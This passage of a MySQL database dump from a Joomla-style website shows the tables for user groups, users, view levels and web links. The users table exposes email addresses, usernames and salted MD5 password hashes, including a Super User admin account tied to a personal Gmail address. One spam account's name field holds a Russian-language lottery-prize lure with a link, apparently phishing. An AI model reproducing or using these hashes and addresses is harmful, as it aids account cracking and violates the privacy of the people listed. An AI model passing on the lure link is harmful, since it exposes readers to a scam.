,(774,2),(775,2),(776,2),(777,2),(778,2),(779,2),(780,2),(781,2),(782,2),(783,2),(784,2),(785,2),(786,2),(787,2),(788,2),(789,2),(790,2),(791,2),(792,2),(793,2),(794,2),(795,2),(796,2),(797,2),(798,2),(799,2),(800,2),(801,2),(802,2),(803,2),(804,2),(805,2),(806,2),(807,2),(808,2),(809,2),(810,2),(811,2),(812,2),(813,2),(814,2),(815,2),(816,2),(817,2),(818,2),(819,2),(820,2),(821,2),(822,2),(823,2),(824,2),(825,2),(826,2),(827,2),(828,2),(829,2),(830,2),(831,2),(832,2),(833,2),(834,2),(835,2),(836,2),(837,2),(838,2),(839,2),(840,2),(841,2),(842,2),(843,2),(844,2),(845,2),(846,2),(847,2),(848,2),(849,2),(850,2),(851,2),(852,2),(853,2),(854,2),(855,2),(856,2),(857,2),(858,2),(859,2),(860,2),(861,2),(862,2),(863,2),(864,2),(865,2),(866,2),(867,2),(868,2),(869,2),(870,2),(871,2),(872,2),(873,2),(874,2),(875,2),(876,2),(877,2),(878,2),(879,2),(880,2),(881,2),(882,2),(883,2),(884,2),(885,2),(886,2),(887,2),(888,2),(889,2),(890,2),(891,2),(892,2),(893,2),(894,2),(895,2),(896,2),(897,2),(898,2),(899,2),(900,2),(901,2),(902,2),(903,2),(904,2),(905,2),(906,2),(907,2),(908,2),(909,2),(910,2),(911,2),(912,2),(913,2),(914,2),(915,2),(916,2),(917,2),(918,2),(919,2),(920,2),(921,2),(922,2),(923,2),(924,2),(925,2),(926,2),(927,2),(928,2),(929,2),(930,2),(931,2),(932,2),(933,2),(934,2),(935,2),(936,2),(937,2),(938,2),(939,2),(940,2),(941,2),(942,2),(943,2),(944,2),(945,2),(946,2),(947,2),(948,2),(949,2),(950,2),(951,2),(952,2),(953,2),(954,2),(955,2),(956,2),(957,2),(958,2),(959,2),(960,2),(961,2),(962,2),(963,2),(964,2),(965,2),(966,2),(967,2),(968,2),(969,2),(970,2),(971,2),(972,2),(973,2),(974,2),(975,2),(976,2),(977,2),(978,2),(979,2),(980,2),(981,2),(982,2),(983,2),(984,2),(985,2),(986,2),(987,2),(988,2),(989,2),(990,2),(991,2),(992,2),(993,2),(994,2),(995,2),(996,2),(997,2),(998,2),(999,2),(1000,2),(1001,2),(1002,2),(1003,2),(1004,2),(1005,2),(1006,2),(1007,2),(1008,2),(1009,2),(1010,2),(1011,2),(1012,2),(1013,2),(1014,2),(1015,2),(1016,2),(1017,2),(1018,2),(1019,2),(1020,2),(1021,2),(1022,2),(1023,2),(1024,2),(1025,2),(1026,2),(1027,2),(1028,2),(1029,2),(1030,2),(1031,2),(1032,2),(1033,2),(1034,2),(1035,2),(1036,2),(1037,2),(1038,2),(1039,2),(1040,2),(1041,2),(1042,2),(1043,2),(1044,2),(1045,2),(1046,2),(1047,2),(1048,2),(1049,2),(1050,2),(1051,2),(1052,2),(1053,2),(1054,2),(1055,2),(1056,2),(1057,2),(1058,2),(556467,8),(556468,2),(556469,2),(556470,2),(556471,2),(556472,2),(556473,2),(556474,2),(739467,8),(761482,8),(778538,8),(778539,2),(778540,2),(778541,2),(778542,2),(778543,2),(778544,2),(778545,2),(778546,2),(778547,2),(778548,2),(778549,2),(778550,2),(778551,2),(778552,2),(778553,2),(778554,2),(786087,8),(786088,2),(786089,2),(786090,2),(786091,2),(786092,2),(786093,2),(786094,2),(786095,2),(786096,2),(786097,2),(786098,2),(786099,2),(786100,2),(786101,2),(786102,2),(786103,2),(786104,2),(786105,2),(786106,2),(786107,2),(786108,2),(826877,8),(844395,8),(875002,8),(875003,2),(875004,2),(875005,2),(875006,2),(875007,2),(875008,2),(875009,2),(875010,2),(875011,2),(875012,2),(875013,2),(875014,2),(875015,2),(875016,2),(875017,2),(875018,2),(875019,2),(875020,2),(875021,2),(875022,2),(875023,2),(875024,2),(875025,2),(875026,2),(875027,2),(875028,2),(875029,2),(875030,2),(875031,2),(875032,2),(875033,2),(875034,2),(875035,2),(875036,2),(875037,2),(875038,2),(875039,2),(875040,2),(875041,2),(875042,2),(875043,2),(875044,2),(875045,2),(875046,2),(875047,2),(875048,2),(875049,2),(875050,2),(875051,2),(875052,2),(875053,2),(875054,2),(875055,2),(875056,2),(875057,2),(875058,2),(875059,2),(875060,2),(875061,2),(875062,2),(875063,2),(875064,2),(875065,2),(875066,2),(875067,2),(875068,2),(875069,2),(875070,2),(875071,2),(875072,2),(875073,2),(875074,2),(875075,2),(875076,2),(875077,2),(875078,2),(875079,2),(875080,2),(875081,2),(875082,2),(875083,2),(875084,2),(875085,2),(875086,2),(875087,2),(875088,2),(875089,2),(875090,2),(875091,2),(875092,2),(875093,2),(875094,2),(875095,2),(875096,2),(875097,2),(875098,2),(875099,2),(875100,2),(875101,2),(875102,2),(875103,2),(875104,2),(875105,2),(875106,2),(875107,2),(875108,2),(875109,2),(875110,2),(875111,2),(875112,2),(875113,2),(875114,2),(875115,2),(875116,2),(875117,2),(875118,2),(875119,2),(875120,2),(875121,2),(875122,2),(875123,2),(875124,2),(875125,2),(875126,2),(875127,2),(875128,2),(875129,2),(875130,2),(875131,2),(875132,2),(875133,2),(875134,2),(875135,2),(875136,2),(875137,2),(875138,2),(875139,2),(875140,2),(875141,2),(875142,2),(875143,2),(875144,2),(875145,2),(875146,2),(875147,2),(875148,2),(875149,2),(875150,2),(875151,2),(875152,2),(875153,2),(875154,2),(875155,2),(875156,2),(875157,2),(875158,2),(875159,2),(875160,2),(875161,2),(875162,2),(875163,2),(875164,2),(875165,2),(875166,2),(875167,2),(875168,2),(875169,2),(875170,2),(875171,2),(875172,2),(875173,2),(875174,2),(875175,2),(875176,2),(875177,2),(875178,2),(875179,2),(875180,2),(875181,2),(875182,2),(875183,2),(875184,2),(875185,2),(875186,2),(875187,2),(875188,2),(875189,2),(875190,2),(875191,2),(875192,2),(875193,2),(875194,2),(875195,2),(875196,2),(875197,2),(875198,2),(875199,2),(875200,2),(875201,2),(875202,2),(875203,2),(875204,2),(875205,2),(875206,2),(875207,2),(875208,2),(875209,2),(875210,2),(875211,2),(875212,2),(875213,2),(875214,2),(875215,2),(875216,2),(875217,2),(875218,2),(875219,2),(875220,2),(875221,2),(875222,2),(875223,2),(875224,2),(875225,2),(875226,2),(875227,2),(875228,2),(875229,2),(875230,2),(875231,2),(875232,2),(875233,2),(875234,2),(875235,2),(875236,2),(875237,2),(875238,2),(875239,2),(875240,2),(875241,2),(875242,2),(875243,2),(875244,2),(875245,2),(875246,2),(875247,2),(875248,2),(875249,2),(875250,2),(875251,2),(875252,2),(875253,2),(875254,2),(875255,2),(875256,2),(875257,2),(875258,2),(875259,2),(875260,2),(875261,2),(875262,2),(875263,2),(875264,2),(875265,2),(875266,2),(875267,2),(875268,2),(875269,2),(875270,2),(875271,2),(875272,2),(875273,2),(875274,2),(875275,2),(875276,2),(875277,2),(875278,2),(875279,2),(875280,2),(875281,2),(875282,2),(875283,2),(875284,2),(875285,2),(875286,2),(875287,2),(875288,2),(875289,2),(875290,2),(875291,2),(875292,2),(875293,2),(875294,2),(875295,2),(875296,2),(875297,2),(875298,2),(875299,2),(875300,2),(875301,2),(875302,2),(875303,2),(875304,2),(875305,2),(875306,2),(875307,2),(875308,2),(875309,2),(875310,2),(875311,2),(875312,2),(875313,2),(875314,2),(875315,2),(875316,2),(875317,2),(875318,2),(875319,2),(875320,2),(875321,2),(875322,2),(875323,2),(875324,2),(875325,2),(875326,2),(875327,2),(875328,2),(875329,2),(875330,2),(875331,2),(875332,2),(875333,2),(875334,2),(875335,2),(875336,2),(875337,2),(875338,2),(875339,2),(875340,2),(875341,2),(875342,2),(875343,2),(875344,2),(875345,2),(875346,2),(875347,2),(875348,2),(875349,2),(875350,2),(875351,2),(875352,2),(875353,2),(875354,2),(875355,2),(875356,2),(875357,2),(875358,2),(875359,2),(875360,2),(875361,2),(875362,2),(875363,2),(875364,2),(875365,2),(875366,2),(875367,2),(875368,2),(875369,2),(875370,2),(875371,2),(875372,2),(875373,2),(875374,2),(875375,2),(875376,2),(875377,2),(875378,2),(875379,2),(875380,2),(875381,2),(875382,2),(875383,2),(875384,2),(875385,2),(875386,2),(875387,2),(875388,2),(875389,2),(875390,2),(875391,2),(875392,2),(875393,2),(875394,2),(875395,2),(875396,2),(875397,2),(875398,2),(875399,2),(875400,2),(875401,2),(875402,2),(875403,2),(875404,2),(875405,2),(875406,2),(875407,2),(875408,2),(875409,2),(875410,2),(875411,2),(875412,2),(875413,2),(875414,2),(875415,2),(875416,2),(875417,2),(875418,2),(875419,2),(875420,2),(875421,2),(875422,2),(875423,2),(875424,2),(875425,2),(875426,2),(875427,2),(875428,2),(875429,2),(875430,2),(875431,2),(875432,2),(875433,2),(875434,2),(875435,2),(875436,2),(875437,2),(875438,2),(875439,2),(875440,2),(875441,2),(875442,2),(875443,2),(875444,2),(875445,2),(875446,2),(875447,2),(875448,2),(875449,2),(875450,2),(875451,2),(875452,2),(875453,2),(875454,2),(875455,2),(875456,2),(875457,2),(875458,2),(875459,2),(875460,2),(875461,2),(875462,2),(875463,2),(875464,2),(875465,2),(875466,2),(875467,2),(875468,2),(875469,2),(875470,2),(875471,2),(875472,2),(875473,2),(875474,2),(875475,2),(875476,2),(875477,2),(875478,2),(875479,2),(875480,2),(875481,2),(875482,2),(875483,2),(875484,2),(875485,2),(875486,2),(875487,2),(875488,2),(875489,2),(875490,2),(875491,2),(875492,2),(875493,2),(875494,2),(875495,2),(875496,2),(875497,2),(875498,2),(875499,2),(875500,2),(875501,2),(875502,2),(875503,2),(875504,2),(875505,2),(875506,2),(875507,2),(875508,2),(875509,2),(875510,2),(875511,2),(875512,2),(875513,2),(875514,2),(875515,2),(875516,2),(875517,2),(875518,2),(875519,2),(875520,2),(875521,2),(875522,2),(875523,2),(875524,2),(875525,2),(875526,2),(875527,2),(875528,2),(875529,2),(875530,2),(875531,2),(875532,2),(875533,2),(875534,2),(875535,2),(875536,2),(875537,2),(875538,2),(875539,2),(875540,2),(875541,2),(875542,2),(875543,2),(875544,2),(875545,2),(875546,2),(875547,2),(875548,2),(875549,2),(875550,2),(875551,2),(875552,2),(875553,2),(875554,2),(875555,2),(875556,2),(875557,2),(875558,2),(875559,2),(875560,2),(875561,2),(875562,2),(875563,2),(875564,2),(875565,2),(875566,2),(875567,2),(875568,2),(875569,2),(875570,2),(875571,2),(875572,2),(875573,2),(875574,2),(875575,2),(875576,2),(875577,2),(875578,2),(875579,2),(875580,2),(875581,2),(875582,2),(875583,2),(875584,2),(875585,2),(875586,2),(875587,2),(875588,2),(875589,2),(875590,2),(875591,2),(875592,2),(875593,2),(875594,2),(875595,2),(875596,2),(875597,2),(875598,2),(875599,2),(875600,2),(875601,2),(875602,2),(875603,2),(875604,2),(875605,2),(875606,2),(875607,2),(875608,2),(875609,2),(875610,2),(875611,2),(875612,2),(875613,2),(875614,2),(875615,2),(875616,2),(875617,2),(875618,2),(875619,2),(875620,2),(875621,2),(875622,2),(875623,2),(875624,2),(875625,2),(875626,2),(875627,2),(875628,2),(875629,2),(875630,2),(875631,2),(875632,2),(875633,2),(875634,2),(875635,2),(875636,2),(875637,2),(875638,2),(875639,2),(875640,2),(875641,2),(875642,2),(875643,2),(875644,2),(875645,2),(875646,2),(875647,2),(875648,2),(875649,2),(875650,2),(875651,2),(875652,2),(875653,2),(875654,2),(875655,2),(875656,2),(875657,2),(875658,2),(875659,2),(875660,2),(875661,2),(875662,2),(875663,2),(875664,2),(875665,2),(875666,2),(875667,2),(875668,2),(875669,2),(875670,2),(875671,2),(875672,2),(875673,2),(875674,2),(875675,2),(875676,2),(875677,2),(875678,2),(875679,2),(875680,2),(875681,2),(875682,2),(875683,2),(875684,2),(875685,2),(875686,2),(875687,2),(875688,2),(875689,2),(875690,2),(875691,2),(875692,2),(875693,2),(875694,2),(875695,2),(875696,2),(875697,2),(875698,2),(875699,2),(875700,2),(875701,2),(875702,2),(875703,2),(875704,2),(875705,2),(875706,2),(875707,2),(875708,2),(875709,2),(875710,2),(875711,2),(875712,2),(875713,2),(875714,2),(875715,2),(875716,2),(875717,2),(875718,2),(875719,2),(875720,2),(875721,2),(875722,2),(875723,2),(875724,2),(875725,2),(875726,2),(875727,2),(875728,2),(875729,2),(875730,2),(875731,2),(875732,2),(875733,2),(875734,2),(875735,2),(875736,2),(875737,2),(875738,2),(875739,2),(875740,2),(875741,2),(875742,2),(875743,2),(875744,2),(875745,2),(875746,2),(875747,2),(875748,2),(875749,2),(875750,2),(875751,2),(875752,2),(875753,2),(875754,2),(875755,2),(875756,2),(875757,2),(875758,2),(875759,2),(875760,2),(875761,2),(875762,2),(875763,2),(875764,2),(875765,2),(875766,2),(875767,2),(875768,2),(875769,2),(875770,2),(875771,2),(875772,2),(875773,2),(875774,2),(875775,2),(875776,2),(875777,2),(875778,2),(875779,2),(875780,2),(875781,2),(875782,2),(875783,2),(875784,2),(875785,2),(875786,2),(875787,2),(875788,2),(875789,2),(875790,2),(875791,2),(875792,2),(875793,2),(875794,2),(875795,2),(875796,2),(875797,2),(875798,2),(875799,2),(875800,2),(875801,2),(875802,2),(875803,2),(875804,2),(875805,2),(875806,2),(875807,2),(875808,2),(875809,2),(875810,2),(875811,2),(875812,2),(875813,2),(875814,2),(875815,2),(875816,2),(875817,2),(875818,2),(875819,2),(875820,2),(875821,2),(875822,2),(875823,2),(875824,2),(875825,2);
/*!40000 ALTER TABLE `xyhmu_user_usergroup_map` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_usergroups`
--

DROP TABLE IF EXISTS `xyhmu_usergroups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_usergroups` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
  `parent_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Adjacency List Reference Id',
  `lft` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set lft.',
  `rgt` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.',
  `title` varchar(100) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_usergroup_parent_title_lookup` (`parent_id`,`title`),
  KEY `idx_usergroup_title_lookup` (`title`),
  KEY `idx_usergroup_adjacency_lookup` (`parent_id`),
  KEY `idx_usergroup_nested_set_lookup` (`lft`,`rgt`) USING BTREE
) ENGINE=InnoDB AUTO_INCREMENT=9 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_usergroups`
--

LOCK TABLES `xyhmu_usergroups` WRITE;
/*!40000 ALTER TABLE `xyhmu_usergroups` DISABLE KEYS */;
INSERT INTO `xyhmu_usergroups` VALUES (1,0,1,20,'Public'),(2,1,6,17,'Registered'),(3,2,7,14,'Author'),(4,3,8,11,'Editor'),(5,4,9,10,'Publisher'),(6,1,2,5,'Manager'),(7,6,3,4,'Administrator'),(8,1,18,19,'Super Users');
/*!40000 ALTER TABLE `xyhmu_usergroups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_users`
--

DROP TABLE IF EXISTS `xyhmu_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_users` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL DEFAULT '',
  `username` varchar(150) NOT NULL DEFAULT '',
  `email` varchar(100) NOT NULL DEFAULT '',
  `password` varchar(100) NOT NULL DEFAULT '',
  `usertype` varchar(25) NOT NULL DEFAULT '',
  `block` tinyint(4) NOT NULL DEFAULT '0',
  `sendEmail` tinyint(4) DEFAULT '0',
  `registerDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `lastvisitDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `activation` varchar(100) NOT NULL DEFAULT '',
  `params` text NOT NULL,
  `lastResetTime` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'Date of last password reset',
  `resetCount` int(11) NOT NULL DEFAULT '0' COMMENT 'Count of password resets since lastResetTime',
  PRIMARY KEY (`id`),
  KEY `usertype` (`usertype`),
  KEY `idx_name` (`name`),
  KEY `idx_block` (`block`),
  KEY `username` (`username`),
  KEY `email` (`email`)
) ENGINE=InnoDB AUTO_INCREMENT=875826 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_users`
--

LOCK TABLES `xyhmu_users` WRITE;
/*!40000 ALTER TABLE `xyhmu_users` DISABLE KEYS */;
INSERT INTO `xyhmu_users` VALUES (135,'Super User','admin','mindaugas.rimkus@gmail.com','a3de309a754482fb828abb371facdb7f:68xo69XNmXxstOsaw2UHLmINLQ3GLky2','deprecated',0,1,'2014-04-09 17:03:14','2025-04-10 10:15:08','0','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0),(875809,'yfuqed','yfuqed','aisha@alerzesy.pl','2d73f212cc208af5d138f2720fc63bde:YxMkh8iByYxbeb46JK9rT0hd314bCwZ1','',1,0,'2021-01-31 14:20:04','0000-00-00 00:00:00','fb48cca24ba73e5a6bed5732629e0d4e','{}','0000-00-00 00:00:00',0),(875810,'yxagez','yxagez','aja@alerzesy.pl','59b341509703077f97155e0917d54b3f:ltxF5A7xsj5RqN5JVuZcKE8cNHkJa1fx','',1,0,'2021-02-03 14:04:14','0000-00-00 00:00:00','e6b3591ea717b321290c19f34385af0b','{}','0000-00-00 00:00:00',0),(875811,'sannalakIR','sannalak','sanna.777@bk.ru','fa5d4a93d2c772ccdbe8e04ab94a272e:uMKFgtud8ZzaZGo00M2N4RVJQzKcvk80','',1,0,'2021-05-25 05:34:42','0000-00-00 00:00:00','d35d242f0866cc35d4d23132364695fa','{}','0000-00-00 00:00:00',0),(875812,'ugehaxop','ugehaxop','6757tygklg5@gordpizza.ru','46936de16371a7221b5f26f0cf61deb1:xbc6s17lnsmgIpcdJ99DCNuEEqXDrn3i','',1,0,'2021-09-30 04:50:42','0000-00-00 00:00:00','dd64cc912913509340e8ea35b6e4a04a','{}','0000-00-00 00:00:00',0),(875813,'molina5','molina5','adam78900504@outlook.fr','4fd3e3e652e9607d75bf6a749cadc643:qt6AGPAMYfDU9Hf1fphhhYTQcbgRVOzF','',1,0,'2021-12-20 07:32:41','0000-00-00 00:00:00','7da26e14e406621c5b2d808e41346434','{}','0000-00-00 00:00:00',0),(875814,'tojamiArirm','tojamidiox','tojami@sakhpubo.xyz','9c71a45a34765a590ad2641b44ecdeaf:50wAkXjkPuolC8mpZ5JPRuAAENf90lmc','',1,0,'2022-02-11 09:57:02','0000-00-00 00:00:00','5fac548e992c2073e5e67b293dfe9f15','{}','0000-00-00 00:00:00',0),(875815,'modwynArirm','modwyndiox','modwyn@sakhpubo.xyz','c01dfc9d5fc0a65e5268eef4e8c13949:DCtZNVI6skPR6l0Wmgq5PUAnY4hKrx8O','',1,0,'2022-02-18 15:02:04','0000-00-00 00:00:00','99216404c424ddf271654c291d6956b3','{}','0000-00-00 00:00:00',0),(875816,'Поздравляем! Заберите Ваш подарочный билет ГОСЛОТО к новогоднему розыгрышу по данной ссылке: https://go77.hb.bizmrg.com/pay.html#dfdedr4dc','ThomasBiand','deniskastovich@gmail.com','c8dd3e847bb40af364d2cac31aa430a0:fak0UwBCV3DiXx1Unaxynyz69VHEXZd3','',1,0,'2022-12-13 07:50:58','0000-00-00 00:00:00','b88ead13aa4cf9c9fd14d8d8261fefce','{}','0000-00-00 00:00:00',0),(875817,'ShawnnfpQT','Shawnwaq','david_yan99@bk.ru','0dbb6091702a938c55e3a8ae2a5339f6:uAFWUY67ZS9NrwGyUb1K9MMz51uKrDu2','',1,0,'2023-11-07 18:58:46','0000-00-00 00:00:00','97a0c7401a1ed8aac51c4cdf9487c5ef','{}','0000-00-00 00:00:00',0),(875818,'RyanvpofVD','Haileypnxn','future@triol.site','2df97e2f309295b43607b60d8d9f8053:onM6olgYgGDPPWAjhEasvb89fomToQ0p','',1,0,'2025-01-21 01:50:20','0000-00-00 00:00:00','4f497137d3c4a88b18fbcbf668e472bd','{}','0000-00-00 00:00:00',0),(875819,'MilesgibqVD','Annaidpv','industry@triol.site','947fb19c3d4cc9a889097e8dabf0852f:YoTBaXeiNgtLHfGH2BRhGHCSGwlU3EfZ','',1,0,'2025-01-29 16:40:29','0000-00-00 00:00:00','30b5bcffc58db8214a068d64c020beaa','{}','0000-00-00 00:00:00',0),(875820,'ColtontkyoVD','Lucaszute','people@triol.site','84ddf737521bed9ba29478b85554b5b1:eaF4SSJyF8oqweUkagBKfwiWNSeD7b5f','',1,0,'2025-02-10 19:40:26','0000-00-00 00:00:00','bf2851702192e67275b5a0d332a4d043','{}','0000-00-00 00:00:00',0),(875821,'dvipVD','pide','something@triol.site','86c1c9fe4a6c54e2511d0fc93902588e:zn9UOtYl94u9bFeKLZDMPxM67XzBDU3U','',1,0,'2025-02-22 12:26:58','0000-00-00 00:00:00','a3dba101688f39d440196606a93d6492','{}','0000-00-00 00:00:00',0),(875822,'RobertLefEF','RobertLef','human@prostpro.fun','f1e93527f6f81fb6a1f6220109675922:vPHe2hcO84m34p634Hy5UJnFd7lfreVq','',1,0,'2025-03-15 00:27:10','0000-00-00 00:00:00','70434342bbbf5128dd761bbb135d216d','{}','0000-00-00 00:00:00',0),(875823,'ikafolos','ikafolos','hertzlanghoff56pcoffy@rustymails.com','076ef89fcb955da540287dbd2ac766e5:FNTVbbbz5rLfi7cpyBSeYh7eBOgUsFyc','',1,0,'2025-04-12 01:57:21','0000-00-00 00:00:00','7be0c95c3d333151671721073eb88aa2','{}','0000-00-00 00:00:00',0),(875824,'ChaseezxLT','Corneliusnam','inx@bubuk.site','58b17932ca0ef2dc5a36ac4698eb532f:EqCYnvtnxfSQyE9EuwxJODP6RaZRazjI','',1,0,'2025-04-26 22:37:39','0000-00-00 00:00:00','29d07fb719937a571d038c8717ada961','{}','0000-00-00 00:00:00',0),(875825,'MerleMizBR','MerleMiz','inb@bubuk.site','503f3e390f7665035047a4b82f4f05ba:Nh4NKmNOYBENxhtTlovMbywQNYExuXik','',1,0,'2025-04-27 14:32:53','0000-00-00 00:00:00','004fcd7528aa04ddc02d269394c0d228','{}','0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `xyhmu_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_viewlevels`
--

DROP TABLE IF EXISTS `xyhmu_viewlevels`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_viewlevels` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
  `title` varchar(100) NOT NULL DEFAULT '',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `rules` varchar(5120) NOT NULL COMMENT 'JSON encoded access control.',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_assetgroup_title_lookup` (`title`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_viewlevels`
--

LOCK TABLES `xyhmu_viewlevels` WRITE;
/*!40000 ALTER TABLE `xyhmu_viewlevels` DISABLE KEYS */;
INSERT INTO `xyhmu_viewlevels` VALUES (1,'Public',0,'[1]'),(2,'Registered',1,'[6,2,8]'),(3,'Special',2,'[6,3,8]');
/*!40000 ALTER TABLE `xyhmu_viewlevels` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_weblinks`
--

DROP TABLE IF EXISTS `xyhmu_weblinks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_weblinks` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `catid` int(11) NOT NULL DEFAULT '0',
  `sid` int(11) NOT NULL DEFAULT '0',
  `title` varchar(250) NOT NULL DEFAULT '',
  `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
  `url` varchar(250) NOT NULL DEFAULT '',
  `description` text NOT NULL,
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `hits` int(11) NOT NULL DEFAULT '0',
  `state` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `archived` tinyint(1) NOT NULL DEFAULT '0',
  `approved` tinyint(1) NOT NULL DEFAULT '1',
  `access` int(11) NOT NULL DEFAULT '1',
  `params` text NOT NULL,
  `language` char(7) NOT NULL DEFAULT '',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `metakey` text NOT NULL,
  `metadesc` text NOT NULL,
  `metadata` text NOT NULL,
  `featured` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Set if link is featured.',
  `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`state`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`),
  KEY `idx_featured_catid` (`featured`,`catid`),
  KEY `idx_language` (`language`),
  KEY `idx_xreference` (`xreference`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_weblinks`
--

LOCK TABLES `xyhmu_weblinks` WRITE;
/*!40000 ALTER TABLE `xyhmu_weblinks` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_weblinks` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2025-05-30 10:51:05
